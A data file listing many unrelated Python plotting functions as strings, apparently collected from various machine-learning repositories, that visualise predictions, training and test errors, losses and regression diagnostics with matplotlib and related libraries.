new_good_index:\r\n ax.scatter(test.features[new_good_index, 0], self.features[new_good_index, 1],\r\n label='Good classified top{0}'.format(int(idx_preds + 1)))\r\n goodclassified_index += new_good_index\r\n new_good_index = []\r\n for idx in range(self.preds.shape[0]):\r\n if self.preds[idx][0][-1] == test.labels[idx]:\r\n new_good_index.append(idx)\r\n if new_good_index:\r\n ax.scatter(test.features[new_good_index, 0], self.features[new_good_index, 1],\r\n label='Good classified top{0}'.format(int(self.preds.shape[1])))\r\n goodclassified_index += new_good_index\r\n reject_idx, misclassified_idx = ([], [])\r\n for idx in range(self.preds.shape[0]):\r\n if idx not in goodclassified_index:\r\n reject = False\r\n for idx_preds in range(self.preds.shape[1] - 1):\r\n if self.preds[idx][1][idx_preds] == self.preds[idx][1][idx_preds + 1]:\r\n reject_idx.append(idx)\r\n reject = True\r\n break\r\n if not reject:\r\n misclassified_idx.append(idx)\r\n if reject_idx:\r\n ax.scatter(test.features[reject_idx, 0], self.features[reject_idx, 1],\r\n label='Reject', c='orange', marker='^')\r\n if misclassified_idx:\r\n ax.scatter(test.features[misclassified_idx, 0], self.features[misclassified_idx, 1],\r\n label='Misclassified', marker='x', c='red')\r\n box = ax.get_position()\r\n ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])\r\n # Put a legend to the right of the current axis\r\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\r\n if title is not None:\r\n ax.set_title(title)\r\n plt.show()", "def plot_scenario_distribution(self):\n x = self.arms\n\n y = self.df.groupby('price').mean().Converted[x]\n y_sex_0 = self.df[self.df.Sex == 0].groupby('price').mean().Converted[x]\n y_sex_1 = self.df[self.df.Sex == 1].groupby('price').mean().Converted[x]\n y_age_0 = self.df[self.df.Under_30 == 0].groupby('price').mean().Converted[x]\n y_age_1 = self.df[self.df.Under_30 == 1].groupby('price').mean().Converted[x]\n\n fig, ax_list = plt.subplots(2,1, figsize=(12, 9))\n\n for ax in ax_list:\n ax.grid(alpha=0.3, linestyle='--')\n\n ax.set_ylim(bottom=0, top=0.6)\n ax.set_xlim(left=50, right=104)\n\n ax.set_xlabel(\"Price\", fontsize=14)\n ax.set_ylabel(\"Conversion Rate\", fontsize=14)\n\n ax.set_xticks(self.arms)\n ax.set_xticklabels(self.arms.astype(np.int64), fontsize=12, alpha=0.7)\n ax.set_yticks(np.linspace(0, 0.7, 8))\n ax.set_yticklabels([str((i * 100).astype(np.int64)) + \"%\" for i in np.linspace(0, 0.7, 8)], fontsize=12, alpha=0.7)\n\n ax.spines['right'].set_alpha(0)\n ax.spines['left'].set_alpha(0.3)\n ax.spines['top'].set_alpha(0)\n ax.spines['bottom'].set_alpha(0.3)\n\n ax_list[0].plot(x, y, label='Global')\n ax_list[0].plot(x, y_sex_0, label='Male', color='moccasin')\n ax_list[0].plot(x, y_sex_1, label='Female', color='darkorange')\n\n ax_list[1].plot(x, y, label='Global')\n ax_list[1].plot(x, y_age_0, label='Under 30', color='red')\n ax_list[1].plot(x, y_age_1, label='Over 30', color='darkred')\n\n ax_list[0].legend()\n ax_list[1].legend()\n\n fig.suptitle(\"Conversion Rate\", fontsize=22)\n\n fig.show()\n\n plt.savefig('chapter5_pricing.png')", "def visualize_predictions(img, predictions, probabilities, x0, y0, windowsize):\n\n # show image\n fig = plt.figure(figsize=(12,12))\n ax = plt.subplot(111)\n plt.imshow(img)\n plt.xticks([])\n plt.yticks([])\n\n # superimpose boxes\n for i, (x,y) in enumerate(zip(x0,y0)):\n if (predictions[i] != \"other\"):\n\n # Create a Rectangle patch\n rect = patches.Rectangle((x,y), windowsize[i], windowsize[i], linewidth=2, edgecolor='r', facecolor='none')\n plt.text(x+5, y+20, predictions[i] + f'/{probabilities[i]:.2f}', fontsize=10, bbox=dict(facecolor='red', alpha=0.5, edgecolor='r'))\n\n # Add the patch to the Axes\n ax.add_patch(rect)\n\n return fig", "def main():\n Nrep = 8 # number of repetition of EM steps\n nm = 3 # number of mixed gaussians.\n ns = 300 # number of samples.\n \n mu, sg, lm, lm_ind, smp, L_true = generate_synthetic_data(nm, ns)\n plt.figure(1, figsize=(5,4))\n plt.clf()\n plot_synthetic_data(smp, mu, sg, lm, lm_ind, nm, ns)\n \n mue, sge, lme = generate_initial_state(nm, ns)\n axi = 0 # subplot number\n plt.figure(2, figsize=(12,9))\n plt.clf()\n for rep in range(Nrep):\n # E-step\n r, L_infer = e_step(smp, mue, sge, lme, nm, ns)\n axi += 1 \n ax = plt.subplot(Nrep/2, 6, axi)\n plot_em_steps(smp, r, mue, sge, lme, nm, ns)\n ax.set_title('E-step : %d' % (rep + 1))\n ax.set_yticklabels([])\n ax.set_xticklabels([])\n ax.set_ylim((-0.1, 0.3))\n\n # M-step\n mue, sge, lme = m_step(smp, r, nm, ns)\n axi += 1 \n ax = plt.subplot(Nrep/2, 6, axi)\n plot_em_steps(smp, r, mue, sge, lme, nm, ns)\n ax.set_title('M-step : %d' % (rep + 1))\n ax.set_yticklabels([])\n ax.set_xticklabels([])\n ax.set_ylim((-0.1, 0.3))\n\n # plot the ground truth for comparison\n axi += 1 \n ax = plt.subplot(Nrep/2, 6, axi)\n plot_synthetic_data(smp, mu, sg, lm, lm_ind, nm, ns)\n ax.set_title('grn_truth')\n ax.set_yticklabels([])\n ax.set_xticklabels([])\n ax.set_ylim((-0.1, 0.3))\n\n print('L_infer = %2.6f , L_true = %2.6f' % (L_infer, L_true))", "def report(self, X, y):\n predict = self.model.predict(X)\n\n skplt.estimators.plot_feature_importances(\n self.model, x_tick_rotation=90)\n plt.show()\n\n fig, ax = plt.subplots(figsize=(7, 7))\n sns.scatterplot(x=y, y=predict)\n lims = [\n np.min([ax.get_xlim(), ax.get_ylim()]), # min of both axes\n np.max([ax.get_xlim(), ax.get_ylim()]), # max of both axes\n ]\n ax.plot(lims, lims, 'k-', alpha=0.75, zorder=0)\n ax.set_aspect('equal')\n ax.set_xlim(lims)\n ax.set_ylim(lims)\n ax.set_xlabel(\"Observed\")\n ax.set_ylabel(\"Predict\")\n ax.set_title(\"Predict vs. Observed\")\n plt.show()\n\n residuals = y - predict\n\n fig, ax = plt.subplots(figsize=(7, 7))\n sns.scatterplot(x=y, y=residuals)\n plt.title(\"Residuals vs. Observed\")\n plt.xlabel(\"Obserbed\")\n plt.ylabel(\"Residuals\")\n plt.show()\n\n plt.hist(residuals)\n plt.title(\"Residuals distribution\")\n plt.xlabel(\"Residuals value\")\n plt.ylabel(\"Count\")\n plt.show()\n\n display(\n pd.DataFrame({\n \"explained_variance_score\":\n metrics.explained_variance_score(y, predict),\n \"mean_absolute_error\":\n metrics.mean_absolute_error(y, predict),\n \"mean_squared_log_error\":\n metrics.mean_squared_log_error(y, predict),\n \"median_absolute_error\":\n metrics.median_absolute_error(y, predict),\n \"r2_score\":\n metrics.r2_score(y, predict)\n },\n index=[0]))", "def parity_plot(self, X, y, hypes='current', shuffle=True, standardize=True, test_size=0.2,\n ax=None, figsize=(5,5), lim=450, title=''):\n \n ### SPLIT + STANDARDIZE DATA ###\n X_train, X_val, y_train, y_val = \\\n model_selection.train_test_split(X, y, shuffle=shuffle, test_size=test_size)\n \n if standardize:\n std = preprocessing.StandardScaler()\n std.fit(X_train)\n X_train, X_val = std.transform(X_train), std.transform(X_val)\n \n ### FIT + PREDICT ###\n model = clone(self.estimator)\n if hypes=='current':\n model.set_params(**self.last_hypes)\n elif hypes=='best':\n model.set_params(**self.best_hypes)\n else:\n try:\n model.set_params(**hypes)\n except:\n print('Passed hypes were invalid')\n \n model.fit(X_train, y_train)\n\n ### BUILD PLOTS ###\n if ax is None:\n plt.figure(figsize=figsize)\n ax=plt.gca()\n\n for frac in ['train','val']:\n y_true = eval('y_'+frac)\n y_pred = model.predict(eval('X_'+frac))\n ax.scatter(y_true, y_pred, alpha=0.7)\n\n ax.plot((0,lim), (0,lim), linestyle='--', color='xkcd:gray')\n ax.set_aspect('equal','datalim')\n ax.set_xlim([-10,lim]); ax.set_ylim([-10,lim])\n ax.set_xlabel(r'True $\\Delta H$')\n ax.set_ylabel(r'Predicted $\\Delta H$')\n ax.legend(['y=x', 'train', 'val'])\n plt.title(title)\n\n return ax", "def visualization(epochs, mse_tr, mse_te):\n plt.semilogx(epochs, mse_tr, marker=\".\", color='b', label='train error')\n plt.semilogx(epochs, mse_te, marker=\".\", color='r', label='test error')\n plt.xlabel(\"k\")\n plt.ylabel(\"rmse\")\n plt.title(\"cross validation\")\n plt.legend(loc=2)\n plt.grid(True)\n plt.savefig(\"cross_validation\")", "def visualize_predictions(model : torch.nn.Module, dataSet : Dataset, \r\n axes, device :torch.device, numTestSamples : int,\r\n id_to_color : np.ndarray = train_id_to_color):\r\n model.to(device=device)\r\n model.eval()\r\n\r\n # predictions on random samples\r\n testSamples = np.random.choice(len(dataSet), numTestSamples).tolist()\r\n # _, axes = plt.subplots(numTestSamples, 3, figsize=(3*6, numTestSamples * 4))\r\n \r\n for i, sampleID in enumerate(testSamples):\r\n inputImage, gt = dataSet[sampleID]\r\n\r\n # input rgb image \r\n inputImage = inputImage.to(device)\r\n landscape = inverse_transform(inputImage).permute(1, 2, 0).cpu().detach().numpy()\r\n axes[i, 0].imshow(landscape)\r\n axes[i, 0].set_title(\"Landscape\")\r\n\r\n # groundtruth label image\r\n label_class = gt.cpu().detach().numpy()\r\n axes[i, 1].imshow(id_to_color[label_class])\r\n axes[i, 1].set_title(\"Groudtruth Label\")\r\n\r\n # predicted label image\r\n y_pred = torch.argmax(model(inputImage.unsqueeze(0)), dim=1).squeeze(0)\r\n label_class_predicted = y_pred.cpu().detach().numpy() \r\n axes[i, 2].imshow(id_to_color[label_class_predicted])\r\n axes[i, 2].set_title(\"Predicted Label\")\r\n\r\n plt.show()", "def plot_2d_results(perceptron, data):\n\n\t# Divides the data into classes.\n\ttraining_data_classes = split_into_classes(data['training_data'], data['training_labels'])\n\ttest_data_classes = split_into_classes(data['test_data'], data['test_labels'])\n\n\t# Plots the data.\n\tplt.plot(training_data_classes[0][:, 0], training_data_classes[0][:, 1], 'bo',\n\t\ttraining_data_classes[1][:, 0], training_data_classes[1][:, 1], 'ro',\n\t\ttest_data_classes[0][:, 0], test_data_classes[0][:, 1], 'b*',\n\t\ttest_data_classes[1][:, 0], test_data_classes[1][:, 1], 'r*',\n\t\tmarkersize = 12)\n\n\t# Constructs a line that represents the decision boundary.\n\tweights = perceptron.weights\n\tbias = perceptron.bias\n\tx_range = np.array([0, 100])\n\ty_range = -(x_range * weights[0] + bias) / weights[1]\n\n\t# Plots the decision boundary.\n\tplt.plot(x_range, y_range, 'k')\n\tplt.show()", "def graph_results(loss, acc):\n N = len(loss)\n x = np.linspace(0, N, N)\n plt.subplot(1,2,1)\n plt.plot(x, loss)\n plt.subplot(1,2,2)\n plt.plot(x,acc)\n plt.show()", "def regression_plots(regression_results, dependant, independant):\n\n # Scatter of two variables\n ds = xr.Dataset()\n ds['dependant'] = dependant\n ds['independant'] = regression_results[f'prediction_skt']\n ds = ds.transpose(\"y\", \"x\", \"time\")\n\n expected = ds['dependant'].values.flatten()\n predicted = ds['independant'].values.flatten()\n \n plt.style.use('stylesheets/contour.mplstyle')\n fig, ax = plt.subplots(figsize=(5, 5))\n ax.axhline(0, color='k', alpha=0.5)\n ax.axvline(0, color='k', alpha=0.5)\n mask = np.isfinite(expected) * np.isfinite(predicted)\n X = expected[mask]\n Y = predicted[mask]\n counts, xedges, yedges = np.histogram2d(X, Y, bins=100)\n xedges = (xedges[1:] + xedges[:-1]) / 2\n yedges = (yedges[1:] + yedges[:-1]) / 2\n im = ax.contourf(xedges, yedges, counts, norm=LogNorm())\n ax.set_xlabel('Expected values')\n ax.set_ylabel('Predicted values')\n # ax.autoscale(False)\n plt.colorbar(im)\n plt.show()\n\n # gradient_expected = regression[f'{dependant}'].polyfit(\n # dim='time', deg=1, cov=True).sel(degree=1).polyfit_coefficients * 1e9*60*60*24*365\n # gradient_predicted, = regression[f'prediction_{independant}'].polyfit(\n # dim='time', deg=1, cov=True).sel(degree=1).polyfit_coefficients * 1e9*60*60*24*365\n\n\n # max_ = max([gradient_expected.max().max(), gradient_predicted.max().max()])\n # min_ = min([gradient_expected.min().min(), gradient_predicted.min().min()])\n\n # divnorm = TwoSlopeNorm(vmin=min_, vcenter=0, vmax=max_)\n # levels = np.arange(min_, max_, 0.1)\n\n # fig = plt.figure(figsize=(5, 10))\n\n # ax = fig.add_subplot(2, 1, 1, projection=ccrs.SouthPolarStereo())\n # im = ax.contourf(gradient_expected.x, gradient_expected.y, gradient_expected.transpose(\n # ), levels=levels, norm=divnorm, cmap='RdBu_r')\n # ax.coastlines()\n # ax.set_title('Expected Trends')\n # plt.colorbar(im, ax=ax)\n\n # ax = fig.add_subplot(2, 1, 2, projection=ccrs.SouthPolarStereo())\n # im = ax.contourf(gradient_predicted.x, gradient_predicted.y,\n # gradient_predicted.transpose(), levels=levels, norm=divnorm, cmap='RdBu_r')\n # ax.coastlines()\n # ax.set_title('Predicted Trends')\n # plt.colorbar(im, ax=ax)\n pass", "def draw_predictions(ax, outputs):\n for output in outputs:\n boxes = output['box3d_lidar'].cpu().detach().numpy()\n confidences = output['scores'].cpu().detach().numpy()\n classes = output['label_preds'].cpu().detach().numpy()\n class_txts = at(class_to_name, *classes)\n for k, box3d in enumerate(boxes):\n x, y, z, w, l, h, r = box3d\n drawBoundingBoxes(ax, x, y, z, w, l, h, r, col='green', linewidth=0.8)\n ax.text(x+(w/2.0)+1, y+(l/2.0)+2, z+h, f\"{class_txts[k]}<{confidences[k]:.2f}>\", color=(0.4, 0.95, 0.3), fontsize=8.0, rotation=math.degrees(r))", "def plot_predictions(self, names=None, min_=1, max_=1000):\n \n if not names:\n names = [*self.models.keys()] + [\"test\", \"final\"]\n\n arr = range(min_, max_, int(30/self.conf[\"time_step\"]))\n\n plt.figure(figsize=(16, 7), dpi=75)\n\n for name in names:\n plt.plot(np.concatenate(self.predict.iloc[arr][name].to_numpy()), label=name)\n\n plt.title(\"Predictions\")\n plt.legend()\n plt.show()", "def plot_predictions(\n train_data, train_labels, test_data, test_labels, predictions=None\n):\n plt.figure(figsize=(10, 7))\n\n # Plot training data in blue\n plt.scatter(train_data, train_labels, c=\"b\", s=4, label=\"Training data\")\n\n # Plot test data in green\n plt.scatter(test_data, test_labels, c=\"g\", s=4, label=\"Testing data\")\n\n if predictions is not None:\n # Plot the predictions in red (predictions were made on the test data)\n plt.scatter(test_data, predictions, c=\"r\", s=4, label=\"Predictions\")\n\n # Show the legend\n plt.legend(prop={\"size\": 14})", "def display_errors(errors_index,img_errors,pred_errors, obs_errors):\n n = 0\n nrows = 3\n ncols = 3\n fig, ax = plt.subplots(nrows,ncols,sharex=True,sharey=True)\n for row in range(nrows):\n for col in range(ncols):\n error = errors_index[n]\n ax[row,col].imshow((img_errors[error]).reshape((28,28)))\n ax[row,col].set_title(\"Predicted label :{}\\nTrue label :{}\".format(pred_errors[error],obs_errors[error]))\n n += 1", "def _plot(self, step, rewards, losses):\n plt.figure(figsize=(20, 5))\n plt.subplot(131)\n plt.title('Total Episode Reward')\n plt.plot(rewards)\n plt.subplot(132)\n plt.title('MSE Loss')\n plt.plot(losses)\n plt.show()", "def plot_good_pred(self, test: Set, title=None, fig_size=None, reject=False):\r\n if reject:\r\n self._plot_good_pred_whit_reject(test, title, fig_size)\r\n else:\r\n self._plot_good_pred_whitout_reject(test, title, fig_size)", "def plot_train_test_data(train, test):\n fig = plt.figure()\n ax1 = fig.add_subplot(1, 2, 1)\n ax1.spy(train, precision=0.01, markersize=0.5)\n ax1.set_xlabel(\"Users\")\n ax1.set_ylabel(\"Items\")\n ax1.set_title(\"Training data\")\n ax2 = fig.add_subplot(1, 2, 2)\n ax2.spy(test, precision=0.01, markersize=0.5)\n ax2.set_xlabel(\"Users\")\n ax2.set_ylabel(\"Items\")\n ax2.set_title(\"Test data\")\n plt.tight_layout()\n plt.savefig(\"../results/train_test\")\n plt.show()", "def PlotComparison(result_values, descrete, continuous, jitter=100):\n df = result_values.copy()\n np.random.seed(0)\n df[continuous] = df[continuous] + np.random.randint(low=-jitter, high=jitter, size=len(df))\n base = alt.Chart(df).transform_calculate(\n ymin=\"datum.mean-2*datum.std\",\n ymax=\"datum.mean+2*datum.std\",\n ).properties(\n title = '[Interactive] Accuracy by Params'\n )\n \n points = base.mark_point(\n filled=True,\n size=10\n ).encode(\n x=continuous,\n y=alt.Y('mean:Q'),#, scale=alt.Scale(domain=(0.55, 0.7))),\n color=descrete,\n tooltip=['mean','std']\n )\n\n errorbars = base.mark_errorbar().encode(\n x=continuous,\n y=alt.Y(\"ymin:Q\",title='Accuracy'),\n y2=\"ymax:Q\",\n color=descrete,\n )\n\n return(points + errorbars)", "def plot(self):\n\t\traw_labels = self.make_raw_data()[1]\n\t\tbalanced_labels = self.get_extra()[1]\n\t\tfig, ax1 = subplots()\n\t\tax2 = ax1.twinx()\n\t\tx = array(range(1, NCLASSES + 1))\n\t\tl1 = ax1.bar(x - 0.3, self.prior_sizes, width = 0.25, color = 'b', align = 'center', label = 'train')\n\t\tl2 = ax2.bar(x, bincount(raw_labels - 1), width = 0.25, color = 'r', align = 'center', label = 'confident')\n\t\tl3 = ax2.bar(x + 0.3, bincount(balanced_labels - 1), width = 0.25, color = 'g', align = 'center', label = 'rebalanced')\n\t\tconfident_frac = len(raw_labels) / float(self.predictions.shape[0])\n\t\tusable_frac = len(balanced_labels) / float(self.predictions.shape[0])\n\t\tax1.set_title('at >{0:.1f}%, {1:.1f}% reliable, {2:.1f}% usable'.format(self.confidence * 100, confident_frac * 100, usable_frac * 100))\n\t\tax1.legend([l1, l2, l3], [l1.get_label(), l2.get_label(), l3.get_label()], loc = 'upper right')\n\t\tax1.set_xticks(x)", "def display_comparison(self, X_val, y_val):\n import matplotlib.pyplot as plt\n x = []\n y = []\n for model_tuple in self.model_list:\n x.append(model_tuple[1])\n y.append(model_tuple[0].score(X_val, y_val))\n plt.scatter(x, y)\n plt.show()", "def plot_observations():\n plt.plot(history.history['loss'], label='training_loss')\n plt.plot(history.history['val_loss'], label='val_loss ')\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.show()\n\n plt.plot(history.history['acc'], label='accuracy')\n plt.plot(history.history['val_acc'], label='val_accuracy')\n plt.xlabel('Epoch')\n plt.ylabel('Accuracy')\n plt.legend(loc='lower right')\n plt.show()\n\n test_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\n print(\"Test Accuracy:\", test_acc)", "def plot_compare_train_test(decisions,bins,classifier, ws=None):\n low = min(np.min(d) for d in decisions)\n high = max(np.max(d) for d in decisions)\n low_high = (low,high)\n # Plot with python.\n plt.figure()\n plt.hist(decisions[0], color='b', alpha=0.5, range=low_high, bins=bins, histtype='stepfilled', density=True, label='S (train)', weights=ws[0])\n plt.hist(decisions[1], color='r', alpha=0.5, range=low_high, bins=bins, histtype='stepfilled', density=True, label='B (train)', weights=ws[1])\n hist, bins = np.histogram(decisions[2], bins=bins, range=low_high, density=True, weights=ws[2])\n center = (bins[:-1] + bins[1:]) / 2\n #scale = len(decisions[2]) / sum(hist)\n scale = sum(ws[2]) / sum(hist)\n err = np.sqrt(hist * scale) / scale\n plt.errorbar(center, hist, yerr=err, fmt='o', c='b', label='S (test)')\n hist, bins = np.histogram(decisions[3], bins=bins, range=low_high, density=True, weights=ws[3])\n #scale = len(decisions[3]) / sum(hist)\n scale = sum(ws[3]) / sum(hist)\n err = np.sqrt(hist * scale) / scale\n plt.errorbar(center, hist, yerr=err, fmt='o', c='r', label='B (test)')\n plt.xticks(np.arange(0, 1, step=0.1))\n plt.xlabel(\"Classifier output\")\n plt.ylabel(\"Arbitrary units\")\n plt.legend(loc='best')\n plt.savefig('plots/plt_' + classifier+'_Output.pdf',format='pdf')\n plt.show(block = False)\n return None", "def plot_prediction_grid(xx, yy, prediction_grid, filename):\n from matplotlib.colors import ListedColormap\n background_colormap = ListedColormap ([\"hotpink\",\"lightskyblue\", \"yellowgreen\"])\n observation_colormap = ListedColormap ([\"red\",\"blue\",\"green\"])\n plt.figure(figsize =(10,10))\n plt.pcolormesh(xx, yy, prediction_grid, cmap = background_colormap, alpha = 0.5)\n plt.scatter(predictors[:,0], predictors [:,1], c = outcomes, cmap = observation_colormap, s = 50)\n plt.xlabel('Variable 1'); plt.ylabel('Variable 2')\n plt.xticks(()); plt.yticks(())\n plt.xlim (np.min(xx), np.max(xx))\n plt.ylim (np.min(yy), np.max(yy))\n plt.savefig(filename)", "def plot_prediction_grid (xx, yy, prediction_grid, filename):\n from matplotlib.colors import ListedColormap\n background_colormap = ListedColormap ([\"hotpink\",\"lightskyblue\", \"yellowgreen\"])\n observation_colormap = ListedColormap ([\"red\",\"blue\",\"green\"])\n plt.figure(figsize =(10,10))\n plt.pcolormesh(xx, yy, prediction_grid, cmap = background_colormap, alpha = 0.5)\n plt.scatter(predictors[:,0], predictors [:,1], c = outcomes, cmap = observation_colormap, s = 50)\n plt.xlabel('Variable 1'); plt.ylabel('Variable 2')\n plt.xticks(()); plt.yticks(())\n plt.xlim (np.min(xx), np.max(xx))\n plt.ylim (np.min(yy), np.max(yy))\n plt.savefig(filename)", "def plot_3D_compare_list(Y_data_test_list, Y_pred_data_list, ref_shape):\n sample_len = Y_data_test_list.shape[0]\n num_classes = Y_data_test_list.max()+1\n for i in np.arange(0, sample_len):\n for c in np.arange(1, num_classes):\n fig = plt.figure()\n plt.figtext(0.1, 0.1, 'Predicted segmentation for test sample No.: ' + str(i + 1) + ', class: ' + str(c), color='white')\n true_lab = Y_data_test_list[i, ]\n true_loc = np.where(true_lab == c)\n pred_lab = Y_pred_data_list[i, ]\n pred_loc = np.where(pred_lab == c)\n\n # concurring locations\n true_copy = true_lab.copy()\n np.place(true_copy, true_copy != c, 99)\n pred_copy = pred_lab.copy()\n np.place(pred_copy, pred_copy != c, 98)\n same_loc = np.where(true_copy == pred_copy)\n\n ax = plt.axes(projection=\"3d\")\n axl = plt.gca()\n axl.set_xlim3d([0, ref_shape[0]])\n axl.set_ylim3d([0, ref_shape[1]])\n axl.set_zlim3d([0, ref_shape[2]])\n ax.scatter3D(true_loc[0], true_loc[1], true_loc[2], marker=\".\", alpha=0.2,\n edgecolor=\"dodgerblue\", facecolor=\"dodgerblue\")\n ax.scatter3D(pred_loc[0], pred_loc[1], pred_loc[2], marker=\".\", alpha=0.01,\n edgecolor=\"lightcoral\", facecolor=\"lightcoral\")\n ax.scatter3D(same_loc[0], same_loc[1], same_loc[2], marker=\".\", alpha=1,\n edgecolor=\"white\", facecolor=\"white\")\n\n fig.set_facecolor('black')\n ax.set_facecolor('black')\n ax.grid(False)\n ax.w_xaxis.pane.fill = False\n ax.w_yaxis.pane.fill = False\n ax.w_zaxis.pane.fill = False\n\n ax.set_xlabel('Width', c='white')\n ax.set_ylabel('Depth', c='white')\n ax.set_zlabel('Height', c='white')\n\n plt.show()", "def parameter_compare(regressions,colors=['m','c'],upper_q=75,lower_q=25,ci_alpha = 0.2, bound_alpha = 0.0,\n labels = None,vertical_bbox_position = 1.4,width = 6,height = 5,draw_samples=True,num_samples =500):\n\n assert type(regressions) is dict\n \n # If no labels are provided, we take them from the first DynamicRegression object\n if labels is None:\n labels = regressions[regressions.keys()[0]].predictor_columns\n \n # this is the number of subplots in this figure\n n_predictors = regressions[regressions.keys()[0]].design.shape[1]\n figure, axes = plt.subplots(n_predictors,figsize = (width,height),sharex=True)\n \n for i,key in enumerate(regressions.keys()):\n \n if draw_samples:\n samples = regressions[key].ffbs.backward_sample(num_samples = num_samples)\n else:\n samples = regressions[key].ffbs.theta\n x = regressions[key].design.index\n \n for j in range(n_predictors):\n \n # Calculate and plot the confidence interval plus median\n lower = np.percentile(samples[:,j,:],lower_q,axis=1)\n upper = np.percentile(samples[:,j,:],upper_q,axis=1)\n median = np.percentile(samples[:,j,:],50,axis=1)\n axes[j].fill_between(x,upper,lower,color=colors[i],alpha = ci_alpha,\n label = '{0}%-{1}% range for {2}'.format(lower_q,upper_q,key))\n axes[j].plot(x,lower,color=colors[i],linestyle='--',alpha = bound_alpha)\n axes[j].plot(x,upper,color=colors[i],linestyle='--',alpha = bound_alpha)\n axes[j].plot(x,median,color=colors[i])\n axes[j].tick_params(direction = 'in')\n\n # a twin axis is made so we can label it easily on the right hand side of the plot\n twin = plt.twinx(axes[j])\n twin.set_ylabel(labels[j])\n \n # hide the tick labels and ticks because we only want the axis label\n twin.set_yticks([])\n \n axes[0].legend(ncol=len(list(regressions.keys())),bbox_to_anchor=(1.00, vertical_bbox_position), borderaxespad=0.,frameon=True,edgecolor='k',fancybox=False)\n return figure", "def plot(nSamples, expectations, variances, exactE, exactVar, title=\"\"):\n fig, axes = plt.subplots(2, 1)\n\n axes[0].semilogx(nSamples, expectations, color=\"black\", label=\"Empirical E(X)\")\n axes[0].axhline(exactE, color=\"darkgray\", label=\"Exact E(X)\")\n\n axes[1].semilogx(nSamples, variances, color=\"black\", label=\"Empirical Var(X)\")\n axes[1].axhline(exactVar, color=\"darkgray\", label=\"Exact Var(X)\")\n\n for ax in axes:\n ax.set_xlabel(\"N draws in the simulation\")\n ax.legend()\n axes[0].set_ylabel(\"E(X)\")\n axes[0].set_title(title)\n axes[1].set_ylabel(\"Var(X)\")\n plt.show()", "def train_test_error(e_train, e_test, model_params):\n\n fig = plt.figure(figsize=FIG_SIZE)\n plt.plot(model_params, e_train, label='Training Set')\n plt.plot(model_params, e_train, label='Test Set')\n plt.xlabel('Model Parameter')\n plt.ylabel('MSE of model')\n plt.legend()\n\n return fig", "def plot_rank_sensitivity(\n dmd_train_error, dmd_test_error, optdmd_train_error, optdmd_test_error\n):\n\n # Generate figure.\n fig, axes = plt.subplots(\n 1, 2, figsize=(fig_width, fig_width / 4), sharex=True, sharey=True\n )\n\n # Misc.\n rank = np.arange(1, dmd_test_error.shape[0] + 1)\n\n #####\n # TRAINING ERROR\n #####\n\n # Plot the vanilla DMD error.\n axes[0].plot(rank, dmd_train_error)\n # Plot the OptDMD error.\n axes[0].plot(rank, optdmd_train_error, ls=\"--\")\n # Add decorators.\n axes[0].set(\n xlabel=r\"Rank of the DMD model\",\n ylabel=r\"Normalized error\",\n title=r\"Training dataset\",\n )\n axes[0].grid(True)\n\n #####\n # TESTING ERROR\n #####\n\n # Plot the vanilla DMD error.\n axes[1].plot(rank, np.mean(dmd_test_error, axis=1), label=r\"Regular DMD\")\n axes[1].fill_between(\n rank,\n np.mean(dmd_test_error, axis=1) + np.std(dmd_test_error, axis=1),\n np.mean(dmd_test_error, axis=1) - np.std(dmd_test_error, axis=1),\n alpha=0.25,\n )\n # Plot the OptDMD error.\n axes[1].plot(\n rank, np.mean(optdmd_test_error, axis=1), ls=\"--\", label=r\"Optimal DMD\"\n )\n axes[1].fill_between(\n rank,\n np.mean(optdmd_test_error, axis=1) + np.std(optdmd_test_error, axis=1),\n np.mean(optdmd_test_error, axis=1) - np.std(optdmd_test_error, axis=1),\n alpha=0.25,\n )\n # Add decorators.\n axes[1].set(\n xlim=(0, rank.max()),\n xlabel=r\"Rank of the DMD model\",\n ylim=(0, 1),\n title=r\"Testing dataset\",\n )\n axes[1].grid(True)\n axes[1].legend(loc=0)\n\n return", "def true_vs_estimated(theta_true, theta_est, param_names, figsize=(8, 4), show=True, filename=None, font_size=12):\n\n # Plot settings\n plt.rcParams['font.size'] = font_size\n\n # Determine n_subplots dynamically\n n_row = int(np.ceil(len(param_names) / 6))\n n_col = int(np.ceil(len(param_names) / n_row))\n\n # Initialize figure\n f, axarr = plt.subplots(n_row, n_col, figsize=figsize)\n if n_row > 1:\n axarr = axarr.flat\n \n # --- Plot true vs estimated posterior means on a single row --- #\n for j in range(len(param_names)):\n \n # Plot analytic vs estimated\n axarr[j].scatter(theta_est[:, j], theta_true[:, j], color='black', alpha=0.4)\n \n # get axis limits and set equal x and y limits\n lower_lim = min(axarr[j].get_xlim()[0], axarr[j].get_ylim()[0])\n upper_lim = max(axarr[j].get_xlim()[1], axarr[j].get_ylim()[1])\n axarr[j].set_xlim((lower_lim, upper_lim))\n axarr[j].set_ylim((lower_lim, upper_lim))\n axarr[j].plot(axarr[j].get_xlim(), axarr[j].get_xlim(), '--', color='black')\n \n # Compute NRMSE\n rmse = np.sqrt(np.mean( (theta_est[:, j] - theta_true[:, j])**2 ))\n nrmse = rmse / (theta_true[:, j].max() - theta_true[:, j].min())\n axarr[j].text(0.1, 0.9, 'NRMSE={:.3f}'.format(nrmse),\n horizontalalignment='left',\n verticalalignment='center',\n transform=axarr[j].transAxes,\n size=12)\n \n # Compute R2\n r2 = r2_score(theta_true[:, j], theta_est[:, j])\n axarr[j].text(0.1, 0.8, '$R^2$={:.3f}'.format(r2),\n horizontalalignment='left',\n verticalalignment='center',\n transform=axarr[j].transAxes, \n size=12)\n \n if j == 0:\n # Label plot\n axarr[j].set_xlabel('Estimated')\n axarr[j].set_ylabel('True')\n axarr[j].set_title(param_names[j])\n axarr[j].spines['right'].set_visible(False)\n axarr[j].spines['top'].set_visible(False)\n \n # Adjust spaces\n f.tight_layout()\n if show:\n plt.show()\n # Save if specified\n if filename is not None:\n f.savefig(\"figures/{}_metrics.png\".format(filename), dpi=600, bbox_inches='tight')\n return f", "def generate_plots(fixed, moving, warped, flows, train_loss, val_loss, reg_loss, epoch):\n moving = moving.detach().cpu().numpy()\n fixed = fixed.detach().cpu().numpy()\n warped = [w.detach().cpu().numpy() for w in warped]\n flows = [f.detach().cpu().numpy() for f in flows]\n\n fig = plt.figure(constrained_layout=True, figsize=(4 * 5, 4 * 3))\n ax_dict = fig.subplot_mosaic(\"\"\"\n FABCD\n LGHIE\n MKJWX\n \"\"\")\n\n ax_dict['F'].imshow(moving[0, 0, 